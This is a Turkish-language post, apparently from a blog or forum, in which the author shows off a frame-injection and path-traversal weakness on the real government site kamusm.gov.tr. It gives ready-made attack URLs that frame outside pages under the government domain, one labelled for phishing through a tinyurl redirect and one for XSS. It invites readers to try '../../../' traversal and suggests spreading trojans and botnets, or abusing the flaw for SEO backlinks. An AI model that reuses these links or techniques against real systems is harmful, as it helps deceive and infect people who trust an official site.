Hani derler ya "vatan hain'i" böyle oldu sanırım , KamuSM'de kripto dökümanlarına göz atarken öyle oldu. Hem bilgi alıyorum hemde injection saldırısı deniyorum :)
Saldırı diyorum pek etkili değil kamusm'nin sistemlerine ama yinede var bir kaç püf nokta. Mesela ;
Belgeler kısmına girmek için şu
link var giriş kısmı sorun yok.
2 Temel Kriptoloji linkine tıkladığımızda yine aynı adres ama temelkriptoloji.html çağrılıyor adres çubugunda görünebilir.
Şimdi biz kendimiz biz temelkriptoloji.html saysasında iken index.html?giris.html olarak çağırdığımızda giris sayfası geliyor. Yani bir dosya çağırdık tabi bu dosyayı bildiğimiz için çağırdık. index.html?../../../ bu komutlarıda deneyin :P
Şimdi index.html?http://gu.venlik.com yaptıgımızda kamusm içinden bir frame ile siteye erişiliyor. Burada anlatmak istediğim olay Sosyal Mühendislik yaparak birine xss , trojan vb. aldatıcı siteleri görüntüleyebiliriz. Kamusm.gov.tr adı altında size bir link göndereyim siz devlet sitesi oldugu için biraz güvende sanıyorsunuz ve giriyorsunuz.
http://www.kamusm.gov.tr/tr/Bilgideposu/Belgeler/teknik/aaa/index.html?http://tinyurl.com/lq36wp
Bu adrese mahsum bir olarak baktığınızda ilk önce kamusm.gov.tr'yi gördüğünüz için size zararsız gelecektir ve tıklayacaksınız tabi bu siteyi kullanarak xss , trojen , botnet yayan bir saldırı olduğundan haberiniz yok.
Frame injection böyle basit görülsede bir çok kişinin bu tür yol ile canını yakabilir.
Not : Bu yöntem ile
XSS Backlink ile sitenizin PR değerini yükseltebilirsiniz.
Bknz
Phishing saldırısı için : http://www.kamusm.gov.tr/tr/Bilgideposu/Belgeler/teknik/aaa/index.html?http://tinyurl.com/lq36wp
XSS saldırısı için : http://www.kamusm.gov.tr/tr/Bilgideposu/Belgeler/teknik/aaa/index.html?http://hacklabs.freehostia.com/xss.html
